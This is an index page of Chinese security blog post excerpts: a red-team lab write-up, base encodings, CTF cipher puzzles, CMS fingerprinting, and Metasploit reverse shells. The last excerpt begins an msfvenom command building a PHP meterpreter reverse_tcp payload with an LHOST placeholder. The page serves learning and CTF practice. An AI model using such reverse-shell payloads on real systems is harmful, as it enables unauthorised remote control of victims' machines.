摘要: 首先感谢红日安全团队分享的靶机实战环境。红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ 本文的目的是为了记录和巩固知识点,并分享出来,希望对大家能有所帮助。 阅读全文
posted @ 2019-10-29 19:46 有牵挂才会怕 阅读(3861) 评论(1) 推荐(1) 编辑
摘要: base64、base32、base16 区别: 1、Base64编码是使用64个可打印ASCII字符(A-Z、a-z、0-9、+、/)将任意字节序列数据编码成ASCII字符串,另有“=”符号用作后缀用途。 2、Base32编码是使用32个可打印字符(A-Z、2-7)对任意字节数据进行编码的方案。 阅读全文
posted @ 2019-06-03 10:35 有牵挂才会怕 阅读(882) 评论(0) 推荐(0) 编辑
摘要: 分享碰到的一些奇奇怪怪的杂项解题方式: 键盘坐标密码: 题目给出一段字符串:11 21 31 18 27 33 34 对照上面的表格,就可以很清晰的看出来密文为:QAZIJCV 猪圈码: 题目为: 一般人还真想不到是这种密码 -_-||| 密文为:NSN Brainfuck/Ook! Obfusca 阅读全文
posted @ 2019-05-30 22:12 有牵挂才会怕 阅读(899) 评论(0) 推荐(0) 编辑
摘要: 解题思路: 参考了鸽子小姐姐的脚本:https://zhuanlan.zhihu.com/p/22678856 具体题目就不贴了。 题目中提示将问题图像化,猜测是将这些16进制数转化为图像,尝试将16进制转换为二进制 乍一看是不是有点像一个二维码,接下来就是具体将0转化为白色,1转化为黑色了。 这里 阅读全文
posted @ 2019-05-27 17:21 有牵挂才会怕 阅读(546) 评论(0) 推荐(0) 编辑
摘要: 今天学到了一些识别CMS的快速方法,也算是一种信息收集经验的积累,在这里要感谢一下我的同事“gakki的童养夫”对我的大力支持。 如何判断网站的CMS? robots.txt文件 robots.txt是网站用来防止爬虫爬取目录的文件,我们可以通过它来对CMS进行判断。 例:以下这种有很多/plus/ 阅读全文
posted @ 2019-05-16 19:10 有牵挂才会怕 阅读(542) 评论(2) 推荐(0) 编辑
摘要: 今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗ 反弹shell的两种方法 第一种Msfvenom实例: 1、msfconsole #启动msf 2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Addre 阅读全文
posted @ 2019-05-15 16:02 有牵挂才会怕 阅读(8125) 评论(0) 推荐(0) 编辑